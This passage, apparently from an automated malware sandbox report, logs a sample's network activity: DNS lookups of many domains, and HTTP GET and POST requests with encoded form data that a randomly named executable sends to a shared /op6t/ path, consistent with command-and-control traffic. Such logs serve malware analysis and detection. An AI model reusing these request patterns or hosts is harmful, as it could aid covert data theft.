                                                                        May 22, 2024 17:34:20.220042944 CEST192.168.11.309.9.9.90xcde6Standard query (0)www.andywork.oneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:34:53.601568937 CEST192.168.11.309.9.9.90xd75bStandard query (0)www.baronbubbol.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:15.424696922 CEST192.168.11.309.9.9.90x215eStandard query (0)www.vcayy.topA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:23.657128096 CEST192.168.11.309.9.9.90x4698Standard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:45.605555058 CEST192.168.11.309.9.9.90x5912Standard query (0)www.babyunitz.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:36:38.079437017 CEST192.168.11.309.9.9.90xedb9Standard query (0)www.getgoodscrub.comA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:36:53.045317888 CEST192.168.11.309.9.9.90x4a5bStandard query (0)www.mustang777slot.netA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:38:26.429601908 CEST192.168.11.309.9.9.90x3c67Standard query (0)www.miagronorte.com.arA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        May 22, 2024 17:30:27.638328075 CEST1.1.1.1192.168.11.300x122No error (0)drive.google.com142.250.69.206A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:30:28.640177011 CEST1.1.1.1192.168.11.300xb083No error (0)drive.usercontent.google.com142.251.33.97A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:11.952263117 CEST1.1.1.1192.168.11.300x8a05No error (0)www.l7aeh.us91.195.240.123A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:27.832376957 CEST1.1.1.1192.168.11.300x8dd9No error (0)www.tycent520test.comtycent520test.comCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:31:27.832376957 CEST1.1.1.1192.168.11.300x8dd9No error (0)tycent520test.com139.162.5.234A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:44.648138046 CEST1.1.1.1192.168.11.300x4933Name error (3)www.baronbubbol.comnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:31:52.994199991 CEST1.1.1.1192.168.11.300x7c84No error (0)www.century21morenoycia.mxcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:31:52.994199991 CEST1.1.1.1192.168.11.300x7c84No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:31:52.994199991 CEST1.1.1.1192.168.11.300x7c84No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:08.466856956 CEST9.9.9.9192.168.11.300x9914Name error (3)www.vcayy.topnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:09.311559916 CEST1.1.1.1192.168.11.300x9914Name error (3)www.vcayy.topnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:11.688114882 CEST9.9.9.9192.168.11.300x5cbbName error (3)www.vcayy.topnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:16.876611948 CEST9.9.9.9192.168.11.300x2192Name error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:25.136393070 CEST9.9.9.9192.168.11.300xd44dNo error (0)www.facesofhoustontx.com34.174.122.2A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:39.014173031 CEST9.9.9.9192.168.11.300xa337Name error (3)www.babyunitz.comnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:32:47.483016014 CEST9.9.9.9192.168.11.300x890dNo error (0)www.cngdesk.com47.243.134.243A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:03.049319029 CEST9.9.9.9192.168.11.300x4074No error (0)www.shortfox.top203.161.49.193A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:17.094779015 CEST9.9.9.9192.168.11.300xe3f5No error (0)www.ng-bo.online37.140.192.90A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:33.390373945 CEST9.9.9.9192.168.11.300x463bName error (3)www.86597.vipnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:42.109771967 CEST9.9.9.9192.168.11.300x38ecNo error (0)www.curty.securty.seCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:33:42.109771967 CEST9.9.9.9192.168.11.300x38ecNo error (0)curty.se185.76.64.170A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:33:56.689013004 CEST9.9.9.9192.168.11.300x3a15Name error (3)www.vicenc39-ns.storenonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:34:05.118482113 CEST9.9.9.9192.168.11.300x99a1No error (0)www.beersekes.com14.225.238.195A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:34:20.397764921 CEST9.9.9.9192.168.11.300xcde6Name error (3)www.andywork.onenonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:34:53.777906895 CEST9.9.9.9192.168.11.300xd75bName error (3)www.baronbubbol.comnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:15.599873066 CEST9.9.9.9192.168.11.300x215eName error (3)www.vcayy.topnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:23.832480907 CEST9.9.9.9192.168.11.300x4698Name error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:35:45.780750036 CEST9.9.9.9192.168.11.300x5912Name error (3)www.babyunitz.comnonenoneA (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:36:38.265254021 CEST9.9.9.9192.168.11.300xedb9No error (0)www.getgoodscrub.com35.213.232.35A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:36:53.538935900 CEST9.9.9.9192.168.11.300x4a5bNo error (0)www.mustang777slot.netmustang777slot.netCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:36:53.538935900 CEST9.9.9.9192.168.11.300x4a5bNo error (0)mustang777slot.net31.172.87.131A (IP address)IN (0x0001)false
                                                                        May 22, 2024 17:38:27.003089905 CEST9.9.9.9192.168.11.300x3c67No error (0)www.miagronorte.com.armiagronorte.com.arCNAME (Canonical name)IN (0x0001)false
                                                                        May 22, 2024 17:38:27.003089905 CEST9.9.9.9192.168.11.300x3c67No error (0)miagronorte.com.ar200.58.112.243A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • drive.usercontent.google.com
                                                                        • www.l7aeh.us
                                                                        • www.tycent520test.com
                                                                        • www.century21morenoycia.mx
                                                                        • www.facesofhoustontx.com
                                                                        • www.cngdesk.com
                                                                        • www.shortfox.top
                                                                        • www.ng-bo.online
                                                                        • www.curty.se
                                                                        • www.beersekes.com
                                                                        • www.getgoodscrub.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.11.304979691.195.240.123807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:12.283785105 CEST481OUTGET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.l7aeh.us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:31:12.607872009 CEST208INHTTP/1.1 403 Forbidden
                                                                        content-length: 93
                                                                        cache-control: no-cache
                                                                        content-type: text/html
                                                                        connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.11.3049797139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:28.207674980 CEST771OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 68 30 49 48 63 57 47 74 2f 78 30 42 48 49 57 2f 2b 54 34 54 6b 59 62 32 4d 65 4e 62 4d 79 51 74 36 44 38 50 7a 78 57 67 59 36 6d 36 4d 2f 48 4c 61 61 51 42 42 62 66 79 50 61 52 48 58 63 41 64 49 71 37 71 65 44 37 79 62 54 69 2f 52 52 70 68 37 42 4a 4a 38 49 57 4b 66 6c 52 35 51 56 63 59 6e 77 4f 4d 32 4b 62 68 6a 6d 76 6a 79 5a 73 6f 47 31 78 45 4c 50 4e 6c 5a 73 53 79 37 34 4e 35 57 76 6d 63 4a 64 34 4d 75 2b 44 58 77 69 39 31 70 72 6e 79 63 48 34 44 72 55 6b 2f 76 73 6c 6d 2f 42 41 4e 62 2b 45 65 33 34 52 79 52 30 51 73 53 71 58 32 46 51 3d 3d
                                                                        Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.11.3049798139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:31.097387075 CEST791OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 6e 6c 59 48 66 78 79 74 75 52 30 41 5a 34 57 2f 30 7a 35 55 6b 59 6e 32 4d 66 4a 31 4d 42 6b 74 36 6d 41 50 68 6a 2b 67 66 36 6d 36 5a 50 48 4b 48 4b 51 65 42 62 44 41 50 61 74 48 58 63 55 64 49 6f 54 71 66 79 37 78 61 44 69 39 5a 78 70 6a 6a 68 4a 4a 38 49 57 4b 66 6c 30 75 51 52 49 59 6e 41 2b 4d 32 76 32 33 70 47 76 67 69 70 73 6f 43 31 78 41 4c 50 4e 44 5a 70 7a 36 37 37 31 35 57 74 75 63 49 4d 34 50 6c 2b 44 52 30 69 39 6d 36 2b 53 31 48 30 46 77 67 44 34 68 69 4e 64 7a 2b 57 78 58 47 39 77 63 6b 59 74 66 4e 31 39 45 51 6f 57 74 59 62 34 37 55 43 77 72 52 58 42 7a 72 57 71 41 4a 30 31 6a 6f 63 59 3d
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MBkt6mAPhj+gf6m6ZPHKHKQeBbDAPatHXcUdIoTqfy7xaDi9ZxpjjhJJ8IWKfl0uQRIYnA+M2v23pGvgipsoC1xALPNDZpz67715WtucIM4Pl+DR0i9m6+S1H0FwgD4hiNdz+WxXG9wckYtfN19EQoWtYb47UCwrRXBzrWqAJ01jocY=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.11.3049799139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:33.998828888 CEST1708OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 6e 6c 59 48 66 78 79 74 75 52 30 41 5a 34 57 2f 30 7a 35 55 6b 59 6e 32 4d 66 4a 31 4d 42 38 74 37 54 4d 50 7a 53 2b 67 65 36 6d 36 59 50 48 58 48 4b 51 54 42 62 4b 4a 50 61 68 39 58 5a 51 64 4a 4a 7a 71 57 67 54 78 54 44 69 39 56 52 70 75 37 42 4a 6d 38 49 47 4f 66 6c 45 75 51 52 49 59 6e 44 6d 4d 77 36 61 33 76 47 76 6a 79 5a 73 65 47 31 78 6f 4c 4c 6f 32 5a 70 33 71 37 4c 56 35 56 4e 2b 63 46 65 51 50 6e 65 44 54 7a 69 38 37 36 2b 57 36 48 30 59 42 67 48 34 62 69 50 39 7a 2b 69 34 36 58 70 30 64 6d 35 64 47 4a 55 35 2f 54 70 36 47 61 59 74 5a 59 68 6f 36 47 44 51 43 31 78 53 76 62 58 70 35 39 63 38 36 52 33 64 54 45 67 49 30 31 38 79 48 74 47 52 33 47 37 5a 37 6b 2f 6c 37 36 75 6c 79 72 43 57 33 58 54 57 54 38 70 49 6e 31 78 2b 63 31 4a 56 4f 52 57 46 62 6e 52 51 49 2b 57 6a 30 78 4c 55 5a 5a 78 36 4b 50 37 35 59 79 4b 42 48 59 34 79 34 4d 45 79 37 4a 49 73 4e 71 6c 4e 65 48 63 4a 57 77 38 74 57 2b 36 76 30 30 2f 63 77 43 4c 4d 56 44 4f 76 50 [TRUNCATED]
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MB8t7TMPzS+ge6m6YPHXHKQTBbKJPah9XZQdJJzqWgTxTDi9VRpu7BJm8IGOflEuQRIYnDmMw6a3vGvjyZseG1xoLLo2Zp3q7LV5VN+cFeQPneDTzi876+W6H0YBgH4biP9z+i46Xp0dm5dGJU5/Tp6GaYtZYho6GDQC1xSvbXp59c86R3dTEgI018yHtGR3G7Z7k/l76ulyrCW3XTWT8pIn1x+c1JVORWFbnRQI+Wj0xLUZZx6KP75YyKBHY4y4MEy7JIsNqlNeHcJWw8tW+6v00/cwCLMVDOvPtZz8fMQHfQNP/Z42HVdBoDqk9Zqt98BXVEtZnfGhP+FJnH4zXr0EkhI8yhqOj8mCxtPCxXwXT6+2BIltNvsiSiIqQpmOwNC+E5thIu6TZuOd211AF+rWZfBp9oJLoB5Dc1T3TXusaW6c+tV/4T4ame2r8FqyymiwZvi9yPJl3w+vDXwsRBpLrIhxFLrwN+xYWMW79mSe4qO9zBYE1duuBfNx7zVxAW5QsxqrJmv/uXpFftvnR6uBfpxi2H7xQwSzWm4WHjeITk6y8i6bGJ7JPGfcfA45kmZ4wXptHMOJqm9sQHCSx36juazy0BgjOY5zghZrhyYKkvdEp+BKVSUUD82StpDLaXZBL6zJN9wd38eXGoul6ujIPTXo9Dw8RsEAcUbamO1KFxJ7SQpH+KzS4MOLBWUYh/V85BROsnStThqMY4ohzT3jrLJYRNl3AXlT5zSjB8ZeIe92MPEdamKMLMXj3kcnOZYSJmH2eAsvBFqm9y8rUBgUO0zRT65syrMy5jzJpu1SLvdMIs0thhXQ1OuqtIKohJaUp/WymITN9e5+U/1BzaWyQleYE/rMcyFbf2H9XAl63Ry1/eNiRZ8p0juAiLVHXf4rElPBqKJByd7QSZnBprt4Tk/rb9RQCFoHHn3a/cTmY5jkZ9fiHigujmM1mmvpL2H8D/ [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.11.3049800139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:36.884895086 CEST490OUTGET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.tycent520test.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:31:39.424586058 CEST562INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:31:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding, Cookie
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Data Raw: 36 0d 0a ef bb bf ef bb bf 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 60


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.11.304980134.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:53.173985004 CEST786OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 6f 71 4c 76 50 34 32 34 38 66 47 6c 6f 77 31 6c 77 7a 62 33 50 61 6d 5a 4a 6a 56 54 6d 59 68 53 55 47 4a 79 6e 4d 69 55 68 36 69 57 71 52 79 77 71 33 37 4f 68 36 70 79 30 67 66 69 50 77 74 67 67 69 44 62 4e 6a 6f 7a 69 39 4f 55 50 68 61 71 31 32 4e 74 64 4f 43 38 64 41 54 49 39 51 72 44 38 55 35 45 42 2b 57 6f 46 4f 5a 43 69 52 62 30 43 79 42 51 59 6c 43 72 68 5a 77 79 39 46 6a 66 4c 4d 32 77 43 59 38 39 51 42 49 35 79 4b 4e 74 6c 58 2f 6f 39 50 51 69 44 6f 2f 4c 56 66 6b 33 42 58 70 4d 38 76 37 65 61 61 31 6d 68 43 64 61 5a 6a 49 6b 49 67 3d 3d
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgoqLvP4248fGlow1lwzb3PamZJjVTmYhSUGJynMiUh6iWqRywq37Oh6py0gfiPwtggiDbNjozi9OUPhaq12NtdOC8dATI9QrD8U5EB+WoFOZCiRb0CyBQYlCrhZwy9FjfLM2wCY89QBI5yKNtlX/o9PQiDo/LVfk3BXpM8v7eaa1mhCdaZjIkIg==
                                                                        May 22, 2024 17:31:53.393793106 CEST1078INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391913.2879038353616611341
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:53 GMT
                                                                        X-Served-By: cache-bfi-krnt7300043-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLrS/q53T25jsaPnfPkSVOt8m++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.11.304980234.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:55.882236004 CEST806OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 70 4b 62 76 4f 5a 32 34 37 2f 47 6d 6e 51 31 6c 2b 54 62 7a 50 61 71 5a 4a 6d 30 4f 6d 72 56 53 56 6b 52 79 67 4f 61 55 67 36 69 57 68 78 79 31 75 33 37 2f 68 36 31 36 30 6b 58 69 50 77 70 67 67 69 7a 62 4e 77 77 38 6a 74 4f 57 61 52 61 30 78 32 4e 74 64 4f 43 38 64 41 48 75 39 51 54 44 39 6c 70 45 4f 37 69 72 61 2b 5a 46 6a 52 62 30 56 43 42 63 59 6c 43 46 68 62 45 55 39 44 6e 66 4c 4e 47 77 43 70 38 69 4c 52 49 2f 2f 71 4d 46 32 55 4b 43 39 64 35 58 4e 76 44 6b 54 4f 6f 67 4a 67 59 57 68 73 50 63 4a 36 4a 4c 39 44 77 79 62 68 4a 2f 56 6b 47 6b 38 31 48 38 68 7a 52 55 4e 78 66 4d 4f 37 43 42 69 6e 6f 3d
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrVSVkRygOaUg6iWhxy1u37/h6160kXiPwpggizbNww8jtOWaRa0x2NtdOC8dAHu9QTD9lpEO7ira+ZFjRb0VCBcYlCFhbEU9DnfLNGwCp8iLRI//qMF2UKC9d5XNvDkTOogJgYWhsPcJ6JL9DwybhJ/VkGk81H8hzRUNxfMO7CBino=
                                                                        May 22, 2024 17:31:56.098582029 CEST1078INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391915.9949035481464927455
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:55 GMT
                                                                        X-Served-By: cache-bfi-krnt7300056-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
